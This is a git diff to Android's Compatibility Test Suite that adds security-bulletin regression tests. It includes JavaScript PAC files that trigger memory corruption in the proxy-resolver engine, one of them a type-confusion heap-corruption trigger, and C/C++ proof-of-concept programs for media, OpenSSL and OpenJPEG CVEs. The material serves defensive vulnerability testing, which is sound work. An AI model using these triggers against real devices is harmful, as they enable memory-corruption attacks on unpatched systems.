Snap for 7316203 from 668ab425f9a646e194263f8d43e6f0d6ab63d927 to rvc-platform-release
Change-Id: I8812a49a8056991ff4ea1557e0b3e0d396a1f007
diff --git a/apps/hotspot/AndroidManifest.xml b/apps/hotspot/AndroidManifest.xml
index 277be5f..fd8b045 100644
--- a/apps/hotspot/AndroidManifest.xml
+++ b/apps/hotspot/AndroidManifest.xml
@@ -5,6 +5,7 @@
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
+ <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<application>
<activity android:name=".MainActivity">
<intent-filter>
diff --git a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
index 2e0ed87..eb81563 100644
--- a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
+++ b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java
@@ -16,5 +16,11 @@
ActivityCompat.requestPermissions(
this, new String[] {Manifest.permission.ACCESS_COARSE_LOCATION}, 2);
}
+
+ if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION)
+ != PackageManager.PERMISSION_GRANTED) {
+ ActivityCompat.requestPermissions(
+ this, new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 2);
+ }
}
}
diff --git a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java
index 9bcf2a1..fb6477d 100644
--- a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java
+++ b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java
@@ -38,7 +38,7 @@
@RunWith(DeviceJUnit4ClassRunner.class)
public class BootStatsHostTest implements IDeviceTest {
- private static final long MAX_WAIT_TIME_MS = 30000;
+ private static final long MAX_WAIT_TIME_MS = 100000;
private static final long WAIT_SLEEP_MS = 100;
private static int[] ATOMS_EXPECTED = {
diff --git a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
index 1da1202..eef1577 100644
--- a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
+++ b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java
@@ -93,6 +93,7 @@
private Intent getHttpIntent() {
Intent i = new Intent(Intent.ACTION_VIEW);
i.addCategory(Intent.CATEGORY_BROWSABLE);
+ i.addCategory(Intent.CATEGORY_DEFAULT);
i.setData(Uri.parse("http://com.android.cts.intent.receiver"));
return i;
}
diff --git a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
index de90629..b63e4ca 100644
--- a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
+++ b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
@@ -222,6 +222,8 @@
File systemSepolicyCilFile = File.createTempFile("plat_sepolicy", ".cil");
systemSepolicyCilFile.deleteOnExit();
+ File fileContextsFile = File.createTempFile("file_contexts", ".txt");
+ fileContextsFile.deleteOnExit();
assertTrue(device.pullFile("/system/etc/selinux/plat_sepolicy.cil", systemSepolicyCilFile));
@@ -229,6 +231,7 @@
secilc.getAbsolutePath(),
"-m", "-M", "true", "-c", "30",
"-o", builtPolicyFile.getAbsolutePath(),
+ "-f", fileContextsFile.getAbsolutePath(),
systemSepolicyCilFile.getAbsolutePath());
pb.redirectOutput(ProcessBuilder.Redirect.PIPE);
pb.redirectErrorStream(true);
diff --git a/hostsidetests/securitybulletin/Android.bp b/hostsidetests/securitybulletin/Android.bp
index f17395e..49c5dfd 100644
--- a/hostsidetests/securitybulletin/Android.bp
+++ b/hostsidetests/securitybulletin/Android.bp
@@ -37,11 +37,12 @@
compile_multilib: "both",
multilib: {
lib32: {
- suffix: "32",
+ suffix: "_sts32",
},
lib64: {
- suffix: "64",
+ suffix: "_sts64",
},
+ // build/soong/common/arch.go default returns nil; no default possible
},
arch: {
arm: {
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index a6b5c79..bd55c9b 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -27,7 +27,6 @@
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
- <option name="test-file-name" value="OomCatcher.apk" />
<option name="test-file-name" value="MainlineModuleDetector.apk" />
<option name="test-file-name" value="hotspot.apk" />
</target_preparer>
diff --git a/hostsidetests/securitybulletin/res/cve_2015_6616.mp4 b/hostsidetests/securitybulletin/res/cve_2015_6616.mp4
new file mode 100644
index 0000000..716c942
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2015_6616.mp4
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4
new file mode 100644
index 0000000..2e30e91
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2019_2046.pac b/hostsidetests/securitybulletin/res/cve_2019_2046.pac
new file mode 100644
index 0000000..82ef431
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2019_2046.pac
@@ -0,0 +1,27 @@
+function FindProxyForURL(url, host){
+ const f = eval(`(function f(i) {
+ if (i == 0) {
+ class Derived extends Object {
+ constructor() {
+ super();
+ ${"this.a=1;".repeat(0x3fffe-8)}
+ }
+ }
+
+ return Derived;
+ }
+
+ class DerivedN extends f(i-1) {
+ constructor() {
+ super();
+ ${"this.a=1;".repeat(0x40000-8)}
+ }
+ }
+
+ return DerivedN;
+ })`);
+
+ let a = new (f(0x7ff))();
+ a;
+ return "DIRECT";
+}
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0224.pac b/hostsidetests/securitybulletin/res/cve_2020_0224.pac
new file mode 100644
index 0000000..6b8f689
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0224.pac
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+function gc() {
+ for (let i = 0; i < 0x10; i++)
+ new ArrayBuffer(0x800000);
+}
+function to_dict(obj) {
+obj.__defineGetter__('x',()=>2);
+obj.__defineGetter__('x',()=>2);
+}
+function fk() {
+rgx = null;
+dbl_arr = [1.1, 2.2, 3.3, 4.4];
+o = {};
+o.__defineGetter__("length", ()=> {
+ rgx = new RegExp(/AAAAAAAA/y);
+ return 2;
+ });
+o[0] = "aaaa";
+o.__defineGetter__(1, ()=> {
+ for (let i=0;i<8;i++) dbl_arr.push(5.5);
+
+ let cnt = 0;
+ rgx[Symbol.replace]("AAAAAAAA", {
+ toString: ()=> {
+ cnt++;
+ if (cnt == 2) {
+ rgx.lastIndex = {valueOf: ()=> {
+ to_dict(rgx);
+ gc();
+ return 0;
+ }};
+
+ }
+
+ return 'BBBB$';
+ }
+ });
+ return "bbbb";
+ });
+p = new Proxy( {}, {
+ ownKeys: function(target) {
+ return o;
+ },
+ getOwnPropertyDescriptor(target, prop) {
+ return {configurable: true, enumerable: true, value: 5};
+ }
+ });
+
+Object.keys(p);
+alert (dbl_arr[0]);
+if (dbl_arr[0] == 1.1) {
+ fail("failed to corrupt dbl_arr");
+}
+}
+
+function FindProxyForURL(url, host) {
+fk();
+return "DIRECT";
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/hostsidetests/securitybulletin/res/cve_2020_0240.pac
similarity index 66%
copy from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
copy to hostsidetests/securitybulletin/res/cve_2020_0240.pac
index f32aa90..677120e 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/hostsidetests/securitybulletin/res/cve_2020_0240.pac
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2020 The Android Open Source Project
+ * Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,14 +13,15 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-package android.security.cts;
-import android.content.Context;
+function FindProxyForURL(url, host){
+array = [];
+array.length = 0xffffffff;
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
-
- @Override
- public boolean onCreate() {
- return true;
- }
+b = array.fill(1.1, 0, {valueOf() {
+ array.length = 32;
+ array.fill(1.1);
+ return 0x80000000;
+}});
+return "DIRECT";
}
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.info b/hostsidetests/securitybulletin/res/cve_2020_0381.info
new file mode 100644
index 0000000..510c136
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0381.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.xmf b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf
new file mode 100644
index 0000000..cbe4bbc
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.info b/hostsidetests/securitybulletin/res/cve_2020_0383.info
new file mode 100644
index 0000000..175c47c
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0383.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.xmf b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf
new file mode 100644
index 0000000..921efe1
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.info b/hostsidetests/securitybulletin/res/cve_2020_0384.info
new file mode 100644
index 0000000..e74b507
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0384.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.xmf b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf
new file mode 100644
index 0000000..5056ce3
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.info b/hostsidetests/securitybulletin/res/cve_2020_0385.info
new file mode 100644
index 0000000..f0d0459
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0385.info
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.xmf b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf
new file mode 100644
index 0000000..6437f9e
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/hostsidetests/securitybulletin/res/cve_2021_0393.pac
similarity index 66%
copy from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
copy to hostsidetests/securitybulletin/res/cve_2021_0393.pac
index f32aa90..42038b61 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/hostsidetests/securitybulletin/res/cve_2021_0393.pac
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2020 The Android Open Source Project
+ * Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,14 +13,10 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-package android.security.cts;
-import android.content.Context;
-
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
-
- @Override
- public boolean onCreate() {
- return true;
- }
+function FindProxyForURL(url, host) {
+ let s = String.fromCharCode(0x4141).repeat(0x10000001) + "A";
+ s = "'" + s + "'";
+ eval(s);
+ return "DIRECT";
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/hostsidetests/securitybulletin/res/cve_2021_0396.pac
similarity index 66%
copy from tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
copy to hostsidetests/securitybulletin/res/cve_2021_0396.pac
index f32aa90..5677445 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java
+++ b/hostsidetests/securitybulletin/res/cve_2021_0396.pac
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2020 The Android Open Source Project
+ * Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -13,14 +13,11 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
-package android.security.cts;
-import android.content.Context;
-
-public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider {
-
- @Override
- public boolean onCreate() {
- return true;
- }
+function FindProxyForURL(url, host){
+ var evil_call = eval("(function(" + Array(65535).fill("x").join(",") + "){})");
+ f(evil_call());
+ return "DIRECT";
}
+
+function f(){}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
index 6f087cc..10bbf66 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp
@@ -26,9 +26,6 @@
"frameworks/av/media/libmedia/include",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
shared_libs: [
"libstagefright",
@@ -37,7 +34,6 @@
"libstagefright_foundation",
"libdatasource",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp
new file mode 100644
index 0000000..33d0680
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2015-6616",
+
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+
+ srcs: [
+ "poc.cpp",
+ ],
+
+ include_dirs: [
+ "frameworks/av/media/libdatasource/include",
+ "frameworks/av/media/libstagefright/include",
+ "cts/hostsidetests/securitybulletin/securityPatch/includes",
+ ],
+
+ shared_libs: [
+ "libstagefright",
+ "libutils",
+ "libmedia",
+ "libdatasource",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp
new file mode 100644
index 0000000..8d175cc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp
@@ -0,0 +1,105 @@
+/**
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <dlfcn.h>
+#include <sys/types.h>
+#include <media/DataSource.h>
+#include <datasource/FileSource.h>
+#include <media/stagefright/MediaExtractor.h>
+#include <android/IMediaExtractor.h>
+#include <media/stagefright/DataSourceBase.h>
+#include <media/stagefright/MetaData.h>
+#include "../includes/common.h"
+#define LIBNAME "/system/lib64/extractors/libmp4extractor.so"
+#define LIBNAME_APEX "/apex/com.android.media/lib64/extractors/libmp4extractor.so"
+
+void * operator new(size_t size) {
+ if (size > 64 * 1024 * 1024) {
+ exit (EXIT_VULNERABLE);
+ }
+ return malloc(size);
+}
+
+using namespace android;
+
+int main(int argc, char **argv) {
+ (void) argc;
+ (void) argv;
+#if _64_BIT
+ GetExtractorDef getDef = nullptr;
+ if (argc < 2) {
+ return EXIT_FAILURE;
+ }
+
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp < DataSource > dataSource = new FileSource(argv[1]);
+ if (dataSource == nullptr) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ void* creator = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+ float confidence;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ creator = (void*) getDef().u.v2.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ creator = (void*) getDef().u.v3.sniff(dataSource->wrap(), &confidence,
+ &meta, &freeMeta);
+ }
+ if (!creator) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ CMediaExtractor *ret = ((CreatorFunc) creator)(dataSource->wrap(), meta);
+ if (ret == nullptr) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ if (meta != nullptr && freeMeta != nullptr) {
+ freeMeta(meta);
+ }
+
+ MediaExtractorCUnwrapper *mediaExtractorCUnwrapper =
+ new MediaExtractorCUnwrapper(ret);
+ MediaTrack* source = mediaExtractorCUnwrapper->getTrack(0);
+ if (source == nullptr) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ source->start();
+
+ dlclose(libHandle);
+#endif /* _64_BIT */
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp
new file mode 100644
index 0000000..9a85317
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2016-2182",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libcrypto",
+ "libssl",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
new file mode 100644
index 0000000..78e1e73
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp
@@ -0,0 +1,138 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <string.h>
+#include <openssl/ssl.h>
+#include <openssl/crypto.h>
+#include <openssl/bn.h>
+#include <memory>
+#include "../includes/common.h"
+
+/** NOTE: These values are for the BIGNUM declared in kBN2DecTests and */
+/** must be updated if kBN2DecTests is changed. */
+#if _32_BIT
+#define ALLOCATION_SIZE 52
+static const int sMallocSkipCount[] = {1,0};
+#else
+#define ALLOCATION_SIZE 56
+static const int sMallocSkipCount[] = {0,0};
+#endif
+
+static const char *kTest =
+ "123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890";
+
+static int sCount = 0;
+static bool sOverloadMalloc = false;
+int loopIndex = 0;
+
+template<typename T>
+struct OpenSSLFree {
+ void operator()(T *buf) {
+ OPENSSL_free(buf);
+ }
+};
+
+using ScopedOpenSSLString = std::unique_ptr<char, OpenSSLFree<char>>;
+
+namespace crypto {
+template<typename T, void (*func)(T*)>
+struct OpenSSLDeleter {
+ void operator()(T *obj) {
+ func(obj);
+ }
+};
+
+template<typename Type, void (*Destroyer)(Type*)>
+struct OpenSSLDestroyer {
+ void operator()(Type* ptr) const {
+ Destroyer(ptr);
+ }
+};
+
+template<typename T, void (*func)(T*)>
+using ScopedOpenSSLType = std::unique_ptr<T, OpenSSLDeleter<T, func>>;
+
+template<typename PointerType, void (*Destroyer)(PointerType*)>
+using ScopedOpenSSL =
+std::unique_ptr<PointerType, OpenSSLDestroyer<PointerType, Destroyer>>;
+
+struct OpenSSLFree {
+ void operator()(uint8_t* ptr) const {
+ OPENSSL_free(ptr);
+ }
+};
+
+using ScopedBIGNUM = ScopedOpenSSL<BIGNUM, BN_free>;
+using ScopedBN_CTX = ScopedOpenSSLType<BN_CTX, BN_CTX_free>;
+} // namespace crypto
+
+static int DecimalToBIGNUM(crypto::ScopedBIGNUM *out, const char *in) {
+ BIGNUM *raw = nullptr;
+ int ret = BN_dec2bn(&raw, in);
+ out->reset(raw);
+ return ret;
+}
+
+void* (*realMalloc)(size_t) = nullptr;
+
+void mtraceInit(void) {
+ realMalloc = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc");
+ return;
+}
+
+void *malloc(size_t size) {
+ if (realMalloc == nullptr) {
+ mtraceInit();
+ }
+ if (!sOverloadMalloc) {
+ return realMalloc(size);
+ }
+ if (size == ALLOCATION_SIZE) {
+ if (sCount >= sMallocSkipCount[loopIndex]) {
+ return nullptr;
+ }
+ ++sCount;
+ }
+ return realMalloc(size);
+}
+
+using namespace crypto;
+
+int main() {
+ CRYPTO_library_init();
+ ScopedBN_CTX ctx(BN_CTX_new());
+ if (!ctx) {
+ return EXIT_FAILURE;
+ }
+ for(loopIndex = 0; loopIndex < 2; ++loopIndex) {
+ ScopedBIGNUM bn;
+ int ret = DecimalToBIGNUM(&bn, kTest);
+ if (!ret) {
+ return EXIT_FAILURE;
+ }
+ sOverloadMalloc = true;
+ ScopedOpenSSLString dec(BN_bn2dec(bn.get()));
+ sOverloadMalloc = false;
+ if (!dec) {
+ return EXIT_FAILURE;
+ }
+ if (strcmp(dec.get(), kTest)) {
+ return EXIT_FAILURE;
+ }
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
index c2b7636..630cb39 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp
@@ -39,10 +39,6 @@
"android.hidl.allocator@1.0",
"android.hardware.media.omx@1.0",
],
- suffix: "32",
- },
- lib64: {
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp
new file mode 100644
index 0000000..bbe6c7b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2016-8332",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.c",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ shared_libs: [
+ "libpdfium",
+ ],
+ include_dirs: [
+ "external/pdfium/third_party/libopenjpeg20",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c
new file mode 100644
index 0000000..86cbaec
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c
@@ -0,0 +1,141 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <string.h>
+#include <stdlib.h>
+#include "openjpeg.h"
+#include "opj_includes.h"
+
+#define REPEATVALUES 100000
+
+unsigned char gStartValues[] = { 0xFF, 0x4F, 0xFF, 0x51, 0x00, 0x2F, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x07, 0x01,
+ 0x01, 0x07, 0x01, 0x01, 0x07, 0x01, 0x01, 0xFF, 0x64, 0x00, 0x23, 0x00,
+ 0x01, 0x43, 0x72, 0x65, 0x61, 0x74, 0x6F, 0x72, 0x3A, 0x20, 0x4A, 0x61,
+ 0x73, 0x50, 0x65, 0x72, 0x20, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E,
+ 0x20, 0x31, 0x2E, 0x37, 0x30, 0x30, 0x2E, 0x31, 0xFF, 0x52, 0x00, 0x0C,
+ 0x00, 0x00, 0x00, 0x01, 0x01, 0x05, 0x04, 0x04, 0x00, 0x01, 0xFF, 0x5C,
+ 0x00, 0x13, 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48,
+ 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x01,
+ 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48,
+ 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x02, 0x40, 0x40,
+ 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50,
+ 0x48, 0x48, 0x50 };
+unsigned int gNumStartValues = sizeof(gStartValues) / sizeof(gStartValues[0]);
+
+unsigned char gRepeatValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00 };
+unsigned int gNumRepeatValues = sizeof(gRepeatValues)
+ / sizeof(gRepeatValues[0]);
+
+unsigned char gLastValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x01, 0x00,
+ 0x00, 0x00, 0x00 };
+unsigned int gNumLastValues = sizeof(gLastValues) / sizeof(gLastValues[0]);
+
+typedef struct {
+ char* blob;
+ ssize_t blobSize;
+ ssize_t readPos;
+} applicationContext;
+
+opj_stream_t* allocate_stream(void) {
+ opj_stream_private_t * stream = NULL;
+
+ stream = (opj_stream_private_t*) opj_calloc(1, sizeof(opj_stream_private_t));
+ if (!stream) {
+ return NULL;
+ }
+
+ stream->m_buffer_size = OPJ_J2K_STREAM_CHUNK_SIZE;
+ stream->m_stored_data = (OPJ_BYTE *) opj_malloc(OPJ_J2K_STREAM_CHUNK_SIZE);
+ if (!stream->m_stored_data) {
